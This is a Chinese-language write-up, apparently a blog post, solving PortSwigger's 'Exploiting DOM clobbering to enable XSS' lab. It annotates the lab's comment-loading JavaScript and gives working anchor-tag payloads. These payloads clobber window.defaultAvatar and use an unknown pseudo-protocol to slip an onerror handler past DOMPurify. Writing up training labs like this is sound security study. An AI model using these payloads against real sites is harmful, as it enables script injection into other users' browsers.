Bootstrap

portswigger的Exploiting DOM clobbering to enable XSS

目录

尝试一下看看可不可以XSS

DOM破坏

查看源码确定DOM破坏漏洞点以及代码分析

首先查看/resources/labheader/js/labHeader.js,没有什么作用

然后domPurify这东西是一个过滤框架也没啥子用

看/resources/js/loadCommentsWithDomClobbering.js尝试分析代码(对于代码的分析在注释中)

技巧

payload构造


尝试一下看看可不可以XSS

首先进入一个评论区进行评论,然后尝试xss

HTML is allowd这里是用textarea标签提交,这没有办法插入

然后再下面尝试xss,无法成功

然后查看源码发现都被过滤了

DOM破坏

查看源码确定DOM破坏漏洞点以及代码分析

DOM破坏肯定是要看js的我们打开源码查看一下,发现了如下图的代码

首先查看/resources/labheader/js/labHeader.js,没有什么作用

completedListeners = [];

(function () {
    let labHeaderWebSocket = undefined;
    function openWebSocket() {
        return new Promise(res => {
            if (labHeaderWebSocket) {
                res(labHeaderWebSocket);
                return;
            }

            let newWebSocket = new WebSocket(location.origin.replace("http", "ws") + "/academyLabHeader");

            newWebSocket.onopen = function (evt) {
                res(newWebSocket);
            };

            newWebSocket.onmessage = function (evt) {
                const labSolved = document.getElementById('notification-labsolved');
                const keepAliveMsg = evt.data === 'PONG';
                if (labSolved || keepAliveMsg) {
                    return;
                }
                document.getElementById("academyLabHeader").innerHTML = evt.data;
                animateLabHeader();

                for (const listener of completedListeners) {
                    listener();
                }
            };

            setInterval(() => {
                newWebSocket.send("PING");
            }, 5000)
        });
    }

    labHeaderWebSocket = openWebSocket();
})();

function animateLabHeader() {
    setTimeout(function() {
        const labSolved = document.getElementById('notification-labsolved');
        if (labSolved)
        {
            let cl = labSolved.classList;
            cl.remove('notification-labsolved-hidden');
            cl.add('notification-labsolved');
        }

    }, 500);
}

然后domPurify这东西是一个过滤框架也没啥子用

看/resources/js/loadCommentsWithDomClobbering.js尝试分析代码(对于代码的分析在注释中)

function loadComments(postCommentPath) {
    let xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            let comments = JSON.parse(this.responseText);
            displayComments(comments);
        }
    };
    xhr.open("GET", postCommentPath + window.location.search);
    xhr.send();

// 创建一个新的 XMLHttpRequest 对象 xhr。
// 设置 onreadystatechange 事件处理函数,检查请求的状态(readyState 为 4 表示请求完成,status 为 200 表示请求成功)
//在请求完成后,将解析后的评论数据传递给 displayComments 函数
// 使用 GET 方法发起请求,URL 由 postCommentPath 和当前页面的查询参数组成(window.location.search)
    

    function escapeHTML(data) {
        return data.replace(/[<>'"]/g, function(c){
            return '&#' + c.charCodeAt(0) + ';';
        })
    }
//对输入内容进行实体编码,让其无法进入标签开始状态
    function displayComments(comments) {
        let userComments = document.getElementById("user-comments");
//获取id,用于显示评论
        for (let i = 0; i < comments.length; ++i)
        {
            comment = comments[i];
            let commentSection = document.createElement("section");
            commentSection.setAttribute("class", "comment");

            let firstPElement = document.createElement("p");
//遍历 comments 数组中的每个评论对象。
// 为每个评论创建一个新的 <section> 元素,并设置其 class 属性为 "comment"。
// 创建一个新的 <p> 元素,用于显示评论的作者、日期和头像。


            let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
            let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

            let divImgContainer = document.createElement("div");
            divImgContainer.innerHTML = avatarImgHTML
// 使用 defaultAvatar 对象提供一个默认头像(如果 window.defaultAvatar 不存在,则使用默认路径)
//     创建一个包含头像 <img> 标签的 HTML 字符串,并设置头像的 src 属性,如果 comment.avatar存在,它会将 comment.avatar 经过 escapeHTML 函数处理后作为头像URL。如果 comment.avatar 不存在,则使用 defaultAvatar.avatar 作为默认头像URL
//     将头像的 HTML 插入到一个新的 <div> 元素中

            if (comment.author) {
                if (comment.website) {
                    let websiteElement = document.createElement("a");
                    websiteElement.setAttribute("id", "author");
                    websiteElement.setAttribute("href", comment.website);
                    firstPElement.appendChild(websiteElement)
                }

                let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
                firstPElement.innerHTML = newInnerHtml
            }

            if (comment.date) {
                let dateObj = new Date(comment.date)
                let month = '' + (dateObj.getMonth() + 1);
                let day = '' + dateObj.getDate();
                let year = dateObj.getFullYear();

                if (month.length < 2)
                    month = '0' + month;
                if (day.length < 2)
                    day = '0' + day;

                dateStr = [day, month, year].join('-');

                let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
                firstPElement.innerHTML = newInnerHtml
            }

            firstPElement.appendChild(divImgContainer);

            commentSection.appendChild(firstPElement);

            if (comment.body) {
                let commentBodyPElement = document.createElement("p");
                commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body);

                commentSection.appendChild(commentBodyPElement);
            }
            commentSection.appendChild(document.createElement("p"));

            userComments.appendChild(commentSection);

//如果评论对象中有 body,则创建一个新的 <p> 元素来显示评论内容,并使用 DOMPurify.sanitize 进行清理。
//将清理后的评论内容 <p> 元素添加到评论部分。
//还会在每个评论后添加一个空的 <p> 元素(可能是为了间距)。
//最后,将创建的评论部分添加到 userComments 元素中。
        }
    }
};

然后我们的注入点在这里,这里非常可疑

我们开始是没有头像的所以我们开始会走到window.defaultAvatar上,所以只要我们想办法构造一个 defaultAvatar.avatar就可以进行XSS了

技巧

然后我们借助一个js特性,看下面两张图id相同时不同的值的取法

然后如果是a标签的话获取属性后会将a标签的href的值进行一个toString方法传进去

具体看下面最后一道题目的解

xss.pwnfunction-Easy-CSDN博客

payload构造

首先闭合下面双引号

所以下面构造的时候1后面要加双引号但是加双引号的时候会出现问题,无法闭合,我们尝试是用HTML实体编码

<a id=defaultAvatar><a id=defaultAvatar name="avatar" href="1&quot; onerror=alert(1)//">

尝试XSS,这里还是不行,"还是会被编码

然后是用一个小技巧,是用一个不存在的伪协议,然后这个伪协议不存在,后面&quot就不会被编码

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="AS:&quot; onerror=alert(1)//">

再从新输入一次评论

;